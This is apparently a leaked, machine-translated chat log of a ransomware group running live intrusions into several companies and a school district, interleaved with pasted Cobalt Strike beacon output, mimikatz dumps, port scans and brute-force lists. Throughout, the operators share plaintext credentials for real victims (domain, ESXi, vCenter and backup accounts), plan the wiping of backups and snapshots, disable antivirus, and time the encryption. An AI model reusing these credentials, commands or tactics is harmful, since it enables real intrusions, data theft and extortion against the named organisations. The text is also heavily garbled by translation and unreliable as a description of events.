10.5.68.241
10.10.221.21
10.10.220.59
10.5.65.51
10.10.220.41
10.10.221.17
10.10.35.137
10.10.73.6
10.5.67.49
i want to check if there are any mapps left before the cipher started, then i went to another cipher and told him that the first koba fell off and there mamapilosya not kobamapi in question because the vpn fell off and did not have time to check this is it?
23.106.215.165
https://palside.com
----------------------------------------------------------------------------------------
199.127.60.23:57230
b5b9BPVoH7jnJt2OEQlUbLxxjvXOvoKa4Ue
``now there are no cob connected to the hostname where mapped before the collapse did not have time to check the case when the cob fell off? to the question of this ``arms: 791/1040 mapped, the cipher in question `` with a possible extension to 12 by the time until 10 we have until what time today? in order for you to estimate this time when closing large volumes of data and general info: cipher speed ~ 20-40 minutes per 1tbokay+ all understand?yes, understood? there is 1 main domain and several secondary domains and you estimate these links as default between all domains you forget to analyze the bundles of domains from small comments see his circle of users by groups and you see more tróós poznachennyh people in the network, also important to watch and there were interesting files on the computer and among them already found chrome
login: root
pass: -you then discounted memberof one Dan would have been longer if you had not given a tipI thought I would have to spend my last day off to work) for Saturday solved the problem with the spheremodelshafto immediately I want to mention such moments as reseche network on that probably all and put off the network after all servers have pulled in already will not work that will extend your livetime in the network an hour or more just times less you will still noise whether it is a question if you have got + + idea is clear?the main thing is that the server is unreachable, the calls of employees are unavailable, everything is slow, the network is frozen, another conversation it's like, until you log on and go to the snaps section, if admins are so pedantic that they go to check snaps every 10 minutes or they might not get it?I understand that it's a scare on the net, but when we've already shredded the avs, lost snaps, does it make sense to hide?or will not notice that the network freesitka how long the admins will not take a head360k requests per hour500 requests every 5 seconds excluding your internal (a la mapping and vmik to open)100 servers in the network and while you work with them 1 hourk how it works on the numbers just so you understand that the client dropout is not simple ping it quite a full-fledged request in the slip because inject should be done almost simultaneouslyeven if you worked in a command and while I was pulling the other mappings to the servers are already drawn and while pulling more additional servers, the old flurry you pull N servers at intervals of 5 seconds such a remark to us there are more comments on the grid, other than the server stall?))mapper228+)))mapper? without lukashenko228 only adequateyou have the ability to choose a name for the alias, not critical it will be without graphics as I do not think it is necessary in this case if you want such a format - yes there can be a cna script, which is given a list ip, comma separated, and it matches these ircons in a given session this optimizes the time during the mappa armatures result of processing you know and for each server copy line by line ```
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full
``Do yourself a blueprint of this command and you will see where you want it to go (text editor), and it will work like this:
``execute-assembly /tmp/SharpMapper.exe host1.domain.local 123.123.123.123 testhost2 /full` + now will be in development Marregvash task to make this map taking into account such small things as "the server does not open what to do "even just to 100 and from 100ya want you to get away 2 main outcomes: up to 100-150 servers and above and while you do not have internet you will take up writing roadmap for the process of running the build2 item my fault3) or you are nervous or something, but you forget too elementary things2) the process of our work in such cases is terrible1) I want to thank you for the process, the network was hard and unaccustomed, but you did it judging by the statistics and you need time to work on the build itself you have 2 hours at most and speed up please for what) in the future I will know, thank you alwaysDOMENCHTPS is not specified in the hostsaskask a comrade easier) you have 5 people around what exactly is not configured so ?help him helpcolleague still does not know how to configure a sheet for coba go to the confab+@tl1 all here hello4 min max I just a little bit and all will soon be when? soon all will soon all not yet in place? good morning nets still scanmedr, backups, in centers, etc. all ready? here's what found) `We also copy them to WORM tape daily, with indefinite retention. The tapes are kept in a fireproof safe at the NOC.What tape?only remote-exec returns nothing like remote-exec psexec ADM-NAS ping google.com -n 1 can you check if the remote computer is connected to the internet?he kind of need to order beforehand, I mean the crap that encrypts files)) assemble the dll? what is it, by the way, with the cryptor? + looks for non-domain ports subnets what ports and why? scan portsport servers, scan user subnetsuser7 Well, yes, get a colleague to help and 410 subnets where users sit :flushed:It seems there is a delay - yesterday 60 something servers were pinged, and today over 200. I need to re-sort as usualDo you want to make a new raw? I haven't noticed, I'll do it now if you haven't noticed when you build a .bin file its hash is always differentDo you just give me a new raw what kind of shellcode is it? i can't pull anything from the lab yesterday because i can't pull anything from the test lab because dllvmi is off, psec works, but the session doesn't come specially i'm not pulling, i just jumped from user's car to dk and had to try and find where it'll let me go..and why do you pull? no, just not all can pull, in particular PDK can not you pull all the servers in the coba or what to do with servers that do not come with the session? add me to his computer froze, now reboot ... who in the group to give?
Domain = cn.net.ntes
In adusers mail = mesg.corp.netease.com
``A couple more+you'll have sessions? \you have a name for the conf+? @user3 give kobu nearer to 2 will kobu be ready da@tl1 New sessions will be there? what progress? by 10 will be new sessions as a variant it is possible to get on dk through rdp for example if it is allowed it not da)is there any kredes?:thinking:? then this user can jump to dk if there dk is a dk they say the french mikat
Authentication Id : 0 ; 63768393 (00000000:03cd0749)
Session : Interactive from 0
User Name : nddevbernst
Domain : JDOSSN
Logon Server : JDODC64
Logon Time : 10/23/2020 2:15:49 PM
SID : S-1-5-21-3450394983-289173729-1299264434-241049

``in the output mimic or in the ad info? is that where the user went? logon sever in the output mimicwill ask in an hour still in questionnew by how much to expect? old are theresessions working?good afternoonfaeray admin is likely to be the main technician(s) make sense to pull other machines? the current machine (dk) have already searched up and down for files related to FireEye and have already checked all the counter .xml and .txtladno it is the practice of saving on the number of agents in general
EDR very often are not installed on workstations, but they are on the serverh Then I saw the assumption was based on the fact that I did not see the process of FireEyeexplain please I do not understand the logic of the assumption based on the examination of users machines? I assumed so, and you say there is no it and look admin on DC and the two servers that I wrote above exactly and it runs in FierEye process called
xagt.ehem
[+] Determining what EDR products are installed on USHDC1-CSPADS02...
[+] host called home, sent: 63 bytes
[+] FeKern.sys Found
[+] 1 EDR Products Found!
    ======================
    | Vendor Information |
    ----------------------
[+] FireEye Found!

``dalf? Is that what it is
https://github.com/harleyQu1nn/AggressorScripts/blob/master/EDR.cnaEDR_Query shows on the firewall at that? there are 135 computers and all the servers? no firewall agent either? in the ad_users search:
tech, it, network, etc.
SharpSniper showed where two of them go, FireEye is not running thereEDR as I understand it is missing, based on:
https://www.anti-malware.ru/security/endpoint-detection-and-response

FireEye, as I understand it, either knocked out or not usedokjr only win defenders checked - not if in the process on the servers does not hang, so it is oldI guess it is either disabled now, or old and no one removes itFireEye is AV, right? a, the directory is[ ](https://mediaeveryone.com/group/saiglobal-com?msg=vcDBBToC2L6hZJp3) but there is no process, no directory from it, AB can not identify sitbeltwas still installed FireEyesitbelt did not withdrawAB as I understand only win win defenders will be in kobezaberikorocha closed like a shop, this user changed the pass and session hung up, can not get a new rise, changed these guys YES pass?so do not unnecessarily noisydskink throwing tom domain sootv already remove a couple of critical pkv tom domain already work, as you prepare, I will give you a session from 2 domainsvot yes from that domain) ` `.
overland.com\dynamics:bobc@t!
overland.com\Administrator:Vi3wSon!c
overland.com\mahesh.admin:Changeme!
overland.com\zerto:CR@CKer$
``To dk from the main working domaina to the domain how to pass)
CRCKer$``
Pinging AD1.overland.com [10.69.0.35] with 32 bytes of data:
Reply from 10.69.0.35: bytes=32 time=10ms TTL=127

Ping statistics for 10.69.0.35:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 10ms, Maximum = 10ms, Average = 10ms

beacon> portscan 10.69.0.35 445 none
[*] Tasked beacon to scan ports 445 on 10.69.0.35
[+] host called home, sent: 93285 bytes
[+] received output:
10.69.0.35:445
Scanner module is complete

``Nothing to remove here, it's a prod segmentetad, dxink and so on to remove themselves or is there? the main domain near you are in the trust prodovom, do not touch it immediately do not rushschellyn.comdomain kobydavay+may offer another network to work until the news? do not remember, I think I saw where something
i'll try the pass if you have it) do they have outlook clients? no, the pass does not fit, the ones i've tried
the rest before the weekend user8 tried, but i don't know what he had there2fa? in the mail access to the neta with the mail we have what? browsers directly from ALL computers, also nothing else check the files, so far nothing (checked sccy? eight? One quit[ ](https://mediaeveryone.com/channel/general?msg=nxpga4pHxRxHF6qxv) 4 in scythe all off, even in the center
ping goes nowhere, domain is not available may well lie useful dokuoksche pay attention to file servers in IT folders let's write back as you check it outcross-check the files, nothing left thereThere are no browsers on all the machines I think the chance is high enough5 people in a working day can find accesses?There's still no found the creeds from the nasovi then give out a couple of vpn, but there without direct accesses. will have to fuck then let's close the sccy then sccy- on belemor have creeps ?snu.edu deadlockedIt turns out that only sccy and snu.No new sessions will be available today? sccy seems to be a couple of sessions alive now checking skytech, there are a couple of sessions there-is there anything alive in `CORP.TELEVISA.COM.MX` ? what to work with today? where are you all already here? it's not like there's a lot of you hello hello
http://172.17.70.13 Banner: nginx
http://172.17.70.13 HQNAS3 - Synology RackStation

http://172.17.70.14 Banner: nginx
http://172.17.70.14 EVO HQ NAS

``````
http://172.17.70.16/certsrv/Default.asp
qlyons
applecherrypenguinski
``````
172.16.1.35:53
172.17.70.7:53
172.17.70.8:53
``cheech.evo.local
172.17.70.16 - ``here somewhere I checked the mail through cme, also no net with the current domain?
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mherna02:Disney Land1',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\odomin:RaspberryPies made in 1911 is not good',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmagent:un4seenconsequences_',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\tylerservice:Ty1er$erv1ce7845_',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\bross:!World domination2019!',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\ldelar:Lnd088034',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\munis:Mun1$5623!',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mzuvan:Logitech45W',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\papercutservice:romeo25-',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmsvc:0mnicrom-',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\mandl:ententeich,',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\pgalde:$uper_0lb@P!!!',
[-] 10.0.51.3:445 - 10.0.51.3:445 - Failed: '.\sccmadmin:juliet25-',
``most likely it will separate 1 space without a clue`` good question ``juicy cum`` or ``juicy cum`` will consider it as a password ``if there will be a cum_login will define it as one whole password with spaces`` I put it in quotes in the file simply domain is not better to write in the file I ask about that if there is a space in the password there without a domain in any case ``you`ll be on LA
USERPASS_FILE no File containing users and passwords separated by space, one pair per line

``and the domain is separately specified in the user:passuser pass module
that's the way it is))
there's just a space there, is it :CLEARTEXT:? just don't remember if it will or won't understand it? through the file most likely cleartexts yes
if you shove them in USERPASS_FILE in smb_login, will it understand quotes in passwords with spaces or will it think that the quotes are part of the password?
```
sisd.net\mherna02:CLEARTEXT:Disney Land1
sisd.net\odomin:CLEARTEXT:RaspberryPies made in 1911 is not good
admin.sisd.k12\sccmagent:CLEARTEXT:un4seenconsequences_
admin.sisd.k12\tylerservice:CLEARTEXT:Ty1er$erv1ce7845_
sisd.net\bross:CLEARTEXT:!World domination2019!
sisd.net\ldelar:CLEARTEXT:Lnd088034
admin.sisd.k12\munis:CLEARTEXT:Mun1$5623!
sisd.net\mzuvan:CLEARTEXT:Logitech45W
admin.sisd.k12\papercutservice:CLEARTEXT:romeo25-
admin.sisd.k12\sccmsvc:CLEARTEXT:0mnicrom-
sisd.net\andl:CLEARTEXT:ententeich,,
sisd.net\pgalde:CLEARTEXT:$uper_0lb@P!
admin.sisd.k12\sccmadmin:CLEARTEXT:juliet25-
``don't polucht only and brutt try the current admins as local there on dki adjacent polzaky not passed if there is no enterpricesucha look for access in the other domain so far datak, here all ready get it?in the name vcertnu then there is probably not. it has what signs? and in the center? a bunch of hypervisors found? then dvcertnu virtualization center or what is it? vcertnu in the center is what? in the center and stuff found?) well, put it out?) yes, also got it)
huh... i'll scrap the ports... work your way up the wpn.
the locker will get through cb - there's more proactive than auto blockingChecked all available armas everywhere cbChecked all servers with cb maybe they'll find a way to break into the network not sit long first thought he was without it, when i pulled the session saw that he was there found a server without cb?
	 * Username : veeam_vss
	 * Domain : EVO
	 * Password : rhR7m1T3ZnhB
	
wdigest :
	 * Username : tcooley
	 * Domain : EVO
	 * Password : SammySeveDog44
	kerberos :
	 * Username : tcooley
	 * Domain : evo.local
	 * Password : SammySeveDog44

	wdigest :
	 * Username : qlyons
	 * Domain : EVO
	 * Password : applecherrypenguinski

```
wait for builduser7 then we will close todaya, there is still a daughter YES in google with 2phmail in the softcloud the rest of the passes do not fit, the mail in general has access to the general manager, some operator and an empty mail is given to the mail is info? well not a dump, maybe important files, planes build all the same judging by the name, perhaps there filewash look
We found everything but the access to one nasa.
there are two disks, one (Mechanic_Library) is not accessible
this one is nowhere to be seen in the files / browsers
coba in lsnado will be a new coba
today no pulls ok, a couple of hortbits and die
SI-SCIP01: 10.0.2.120
SKY-SQL: 10.0.2.129
SKY-BEUZA-01: 10.0.2.20
SKY-DC02: 10.0.2.11
SKY-CRM: 10.0.2.10
DMW-PRINT-PC: 10.0.6.75
SKY-BEDMW-01: 10.0.6.13
SKY-DC04: 10.0.6.27
MTN-PLAYER-PC: 10.0.1.180
``````
MTN-PLAYER-PC
SKY-MGT
SKY-BAL
SKY-TS01
SKY-TS01
SKYDC-RH
SKY-DCPS
UZA-DERRICKW-PC
UZA-DERRICKW-PC
DMW-MANDYF-SURF
DMW-FRONTDESK2
DMW-CHUCKM1-PC
DMW-CHUCKM1-PC
``hdavail.comhello everybody hello everybodyuser4user8 This one we don't have access to, the others do
```
Shared resources at \10.0.6.83

LS520Dc5f server

Share name Type Used as Comment

-------------------------------------------------------------------------------
Mechanic_Library Disk Mechanic Library
Public Disk
The command completed successfully.

On these servers, you have to check the vim console to see if there is a link to the cloud
```
SKY-BEDMW-01.skytech1.local - VEEAM BACKUP SERVERS
sky-beuza-01.skytech1.local
``````
https://10.0.2.32/ui/#/login ESXi' root\$uperm@n
``````
Website: https://sky-vcenter65.skytech1.local
Username: 'administrator@vsphere.local'
Password: 'Superm@n2018'
``````
10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) NAS admin/password FS visible from YES
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas
10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas

``If I understood correctly some kind of admin from what ``
http://10.0.6.243/web/guest/en/websys/webArch/mainFrame.cgi
``````
https://10.0.6.98/login.html PowerEdge T620

http://10.0.6.153/ myshara
http://10.0.6.83/rtknas4.40/ nas
http://10.0.6.54 is requesting your username and password. The site says: "ReadyNAS Admin".
``````
https://10.0.2.32/ui/#/login ESXi'
https://10.0.2.34/ui/#/login
https://10.0.2.36/ui/#/login
https://10.0.2.38/ui/#/login
https://10.0.6.24/ui/
``````
10.0.6.243:80
10.0.6.155:80
10.0.6.153:443
10.0.6.153:80
10.0.6.130:8080
10.0.6.130:443
10.0.6.130:80
10.0.6.124:8080
10.0.6.124:80
10.0.6.117:8080
10.0.6.117:443
10.0.6.117:80
10.0.6.98:443
10.0.6.98:80
10.0.6.96:8080
10.0.6.96:443
10.0.6.96:80
10.0.6.95:443
10.0.6.95:80
10.0.6.86:8080
10.0.6.86:443
10.0.6.86:80
10.0.6.83:443
10.0.6.83:80
10.0.6.73:8080
10.0.6.73:443
10.0.6.73:80
10.0.6.62:443
10.0.6.62:80
10.0.6.58:8080
10.0.6.58:443
10.0.6.58:80
10.0.6.54:443
10.0.6.54:80
10.0.6.109:22 (SSH-2.0-dropbear)
10.0.6.98:22 (SSH-2.0-OpenSSH_7.4)
10.0.6.79:22 (SSH-2.0-dropbear)
10.0.6.155:8080
10.0.6.155:443
10.0.6.54:445 (platform: 500 version: 6.1 name: SKYNASJEN domain: WORKGROUP) nas
10.0.6.83:445 (platform: 500 version: 4.9 name: LS520DC5F domain: WORKGROUP) nas
10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas



10.0.2.39:443
10.0.2.39:80
10.0.2.38:443
10.0.2.38:80
10.0.2.36:443
10.0.2.36:80
10.0.2.35:443
10.0.2.35:80
10.0.2.34:443
10.0.2.34:80
10.0.2.32:443
10.0.2.32:80
10.0.2.31:443
10.0.2.31:80
10.0.2.28:443
10.0.2.28:80
10.0.2.25:443
10.0.2.25:80
10.0.2.21:80
10.0.2.20:80
10.0.2.17:80
10.0.2.15:443
10.0.2.15:80
10.0.2.11:443
10.0.2.11:80
10.0.2.10:443
10.0.2.10:80
10.0.2.8:80
10.0.2.7:80
10.0.2.1:80
10.0.1.179:80
10.0.1.101:80
10.0.2.39:22 (SSH-2.0-OpenSSH_7.4)
10.0.2.38:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.36:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.35:22 (SSH-2.0-OpenSSH_7.4)
10.0.2.34:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.32:22 (SSH-2.0-OpenSSH_7.5)
10.0.2.31:22 (SSH-2.0-OpenSSH_7.4)
10.0.2.17:22 (SSH-2.0-OpenSSH_5.9p1-hpn13v11)
10.0.2.15:22 (SSH-2.0-OpenSSH_7.1)
10.0.2.5:22 (SSH-2.0-dropbear)
10.0.2.4:22 (SSH-2.0-dropbear)
10.0.2.2:22 (SSH-2.0-dropbear)
10.0.1.181:22 (SSH-2.0-dropbear)
10.0.2.3:22 (SSH-2.0-dropbear)

``I got it, can you help dumbo come back before 1 o'clock@tl1 help others? the machine seems to be off
all the sessions are off,the last 10-15 minutes of doing nothing with the session is ok,keep working i ran it without and it worked i'm not sure i need it,no it didn't delete? what do i wait for?
how do you know it worked? shell rundll32 C:\Users\color764\AppData\Local\Packages\AD2F1837.HPPrinterControl_v10z8vjag6ke6\LocalState\HPPrinterControl_v10.dll, ehnpruPontv #generald how to run and what does it do?

```

beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
[+] received output:
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
ORANGE_FACT\Desk_Top_Admin
ORANGE_FACT\Domain Admins
ORANGE_FACT\POSAdmin
The command completed successfully.



beacon> shell net group "Domain admins" /dom
[*] Tasked beacon to run: net group "Domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain vpinc.net.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator avamarbackupuser hpsim
itinfo jf jimfu
jmb jonb kendallr
kr MDJ meraki1
mikedj MSOL_c4e9c8b90962 prtg
prtgnew rd scotttaylor
siem_agent SQLADMIN SQLSYSTEM
Svc_ADSync zscaler
The command completed successfully.




beacon> shell net group "Enterprise Admins" /dom
[*] Tasked beacon to run: net group "Enterprise Admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain vpinc.net.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator jb jf
jmb kr MDJ
mikedj rd scotttaylor
Svc_ADSync
The command completed successfully.



``````
[*] 192.168.168.5:445 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.168.5:445 - Host could not be identified: Unix (Samba 3.0.33-3.41.el5_11)
[*] 192.168.168.15:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:optional) (uptime:21w 0d 1h 37m 25s) (guid:{ff73b7ae-f1ba-46e5-8e8b-3c9fb9444156}) (authentication domain:PKGPROD)
[+] 192.168.168.15:445 - Host is running Windows 2012 Standard (build:9200) (name:TIMECLOCKSQL) (domain:PKGPROD)
[*] 192.168.168.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0) (signatures:required) (uptime:6d 8h 40m 17s) (guid:{c40e3c81-0bce-4afc-ba0d-e18c58581a0c}) (authentication domain:PKGPROD)
[+] 192.168.168.10:445 - Host is running Windows 2012 Standard (build:9200) (name:2K12SERVER) (domain:PKGPROD)
[*] 192.168.168.1-80:     - Scanned 23 of 80 hosts (28% complete)
[*] 192.168.168.1-80:     - Scanned 31 of 80 hosts (38% complete)
[*] 192.168.168.1-80:     - Scanned 45 of 80 hosts (56% complete)
[*] 192.168.168.1-80:     - Scanned 46 of 80 hosts (57% complete)
[*] 192.168.168.1-80:     - Scanned 50 of 80 hosts (62% complete)
[*] 192.168.168.1-80:     - Scanned 50 of 80 hosts (62% complete)
[*] 192.168.168.54:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 0d 8h 27m 49s) (guid:{56e90780-c2ba-45ef-877d-d2f418746196}) (authentication domain:PKGPROD)
[+] 192.168.168.54:445 - Host is running Windows 8.1 Pro (build:9600) (name:FRONTDESK) (domain:PKGPROD)
[*] 192.168.168.53:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{d0b01a41-07d7-4ad5-a0b6-90c069a5bd26}) (authentication domain:PKGPROD)
[*] 192.168.168.70:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:3d 8h 25m 12s) (guid:{cb8fffad-f637-4c85-b211-e32b405df3ac}) (authentication domain:PKGPROD)
[+] 192.168.168.70:445 - Host is running Windows 8.1 Pro (build:9600) (name:PKG-101) (domain:PKGPROD)
[*] 192.168.168.63:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:optional) (uptime:1w 0d 8h 28m 22s) (guid:{ac014121-b0c2-442a-93b8-d2c98f8c66e2}) (authentication domain:PKGPROD)
[+] 192.168.168.63:445 - Host is running Windows 8.1 Pro (build:9600) (name:PKG-102) (domain:PKGPROD)
[*] 192.168.168.1-80:     - Scanned 56 of 80 hosts (70% complete)
[*] 192.168.168.73:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{ce91e8ea-649b-4aa0-b6e3-81718f694399}) (authentication domain:PKGPROD)
[*] 192.168.168.66:445 - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-CCM) (signatures:optional) (guid:{62b17fea-9ad5-4532-92cf-8276e5e90b86}) (authentication domain:PKGPROD)
[*] 192.168.168.1-80:     - Scanned 71 of 80 hosts (88% complete)
[*] 192.168.168.1-80:     - Scanned 80 of 80 hosts (100% complete)
[*] Auxiliary module execution completed

``https://kali.tools/?p=5342что for thin clients?'' script runs `` ACUCOBOL-GT Web Thin Client ````
' Location of file with usernames and human-readable terminal numbers
SouthWareUsersFile = "swusers\swusers.txt"
``what's up?
beacon> mimikatz kerberos::list
[*] Tasked beacon to run mimikatz's kerberos::list command
[+] host called home, sent: 706120 bytes
[+] received output:

[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; forwardable ;

[00000001] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 8:27:44 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;

[00000002] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/18/2020 4:48:38 AM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : RPCSS/2K12SERVER.pkgprod.local @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;

[00000003] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : ldap/2k12server.pkgprod.local @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;

[00000004] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : cifs/2k12server.pkgprod.local/pkgprod.local @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;

[00000005] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 9/17/2020 9:06:32 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44 PM
   Server Name : LDAP/2k12server.pkgprod.local/pkgprod.local @ PKGPROD.LOCAL
   Client Name : jess @ PKGPROD.LOCAL
   Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authenticate ; renewable ; forwardable ;
``````
(ARP) Target '192.168.168.10' is alive. (ARP) Target '192.168.168.15' is alive. 00-15-5D-A8-0A-039C
(ARP) Target '192.168.168.5' is alive. -(ARP) Target '192.168.168.1' is alive. 008E2C---1599B8---5D5BED---A88823---0A6A3A-
-0100


[+] received output:
(ARP) Target '192.168.168.54' is alive. (ARP) Target '192.168.168.53' is alive. 64F4--5139--0609--551A--08EA--50A7

(ARP) Target '192.168.168.63' is alive. A0-48-1C-99-8D-D8
(ARP) Target '192.168.168.50' is alive. 98-8B-0A-C2-59-08
(ARP) Target '192.168.168.66' is alive. (ARP) Target '192.168.168.70' is alive. F4A0--3948--091C--0F99--9B8E--A8AD

(ARP) Target '192.168.168.73' is alive. 9C-7B-EF-AD-76-64

[+] received output:
(ARP) Target '192.168.168.88' is alive. 00-11-0A-F7-EA-A8

[+] received output:
(ARP) Target '192.168.168.231' is alive. 00-AF-1F-6F-A2-E1

[+] received output:
192.168.168.73:3389

[+] received output:
192.168.168.73:139
192.168.168.73:135

[+] received output:
192.168.168.70:3389

[+] received output:
192.168.168.70:664

[+] received output:
192.168.168.70:623

[+] received output:
192.168.168.70:139
192.168.168.70:135

[+] received output:
192.168.168.66:3389

[+] received output:
192.168.168.66:139
192.168.168.66:135

[+] received output:
192.168.168.63:3389

[+] received output:
192.168.168.63:664

[+] received output:
192.168.168.63:623

[+] received output:
192.168.168.63:139
192.168.168.63:135

[+] received output:
192.168.168.54:664

[+] received output:
192.168.168.54:139
192.168.168.54:135

[+] received output:
192.168.168.53:3389

[+] received output:
192.168.168.53:139
192.168.168.53:135

[+] received output:
192.168.168.50:554

[+] received output:
192.168.168.50:80

[+] received output:
192.168.168.15:5985
192.168.168.15:5949
192.168.168.15:5948

[+] received output:
192.168.168.15:5504

[+] received output:
192.168.168.15:3389

[+] received output:
192.168.168.15:443

[+] received output:
192.168.168.15:139
192.168.168.15:135
192.168.168.15:80
192.168.168.10:5985
192.168.168.10:5949
192.168.168.10:5948

[+] received output:
192.168.168.10:3389

[+] received output:
192.168.168.10:636

[+] received output:
192.168.168.10:593

[+] received output:
192.168.168.10:464

[+] received output:
192.168.168.10:389
192.168.168.10:139
192.168.168.10:135

[+] received output:
192.168.168.10:88
192.168.168.10:53
192.168.168.5:5632

[+] received output:
192.168.168.5:631
192.168.168.5:609

[+] received output:
192.168.168.5:139
192.168.168.5:111
192.168.168.5:22 (SSH-2.0-OpenSSH_4.3)

[+] received output:
192.168.168.1:443

[+] received output:
192.168.168.1:80
192.168.168.1:22 (SSH-2.0-OpenSSH_7.2)
192.168.168.5:445 (platform: 500 version: 4.9 name: PKGPROD domain: MYGROUP)
192.168.168.10:445 (platform: 500 version: 6.2 name: 2K12SERVER domain: PKGPROD)
192.168.168.15:445 (platform: 500 version: 6.2 name: TIMECLOCKSQL domain: PKGPROD)
192.168.168.53:445 (platform: 500 version: 10.0 name: SALES2-HP-2019 domain: PKGPROD)
192.168.168.54:445 (platform: 500 version: 6.3 name: FRONTDESK domain: PKGPROD)
192.168.168.63:445 (platform: 500 version: 6.3 name: PKG-102 domain: PKGPROD)
192.168.168.66:445 (platform: 500 version: 10.0 name: BARBARA-HP-2019 domain: PKGPROD)
192.168.168.70:445 (platform: 500 version: 6.3 name: PKG-101 domain: PKGPROD)
192.168.168.73:445 (platform: 500 version: 10.0 name: SALES1-HP-2019 domain: PKGPROD)
Scanner module is complete
``````
Windows IP Configuration

   Host Name . . . . . Sales1-HP-2019
   Primary Dns Suffix . . . . ♪ pkgprod.local ♪
   Node Type ... ... . .: Hybrid
   IP Routing Enabled . . . . : No.
   WINS Proxy Enabled. .: No
   DNS Suffix Search List. : pkgprod.local

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix . . : pkgprod.local
   Description . . . . . : Realtek PCIe GbE Family Controller
   Physical Address . . . . .: 9C-7B-EF-AD-76-64
   DHCP Enabled. . . . . .: Yes
   Autoconfiguration Enabled . .: Yes
   Link-local IPv6 Address. : fe80::994:371f:ea5d:17bb%7(Preferred)
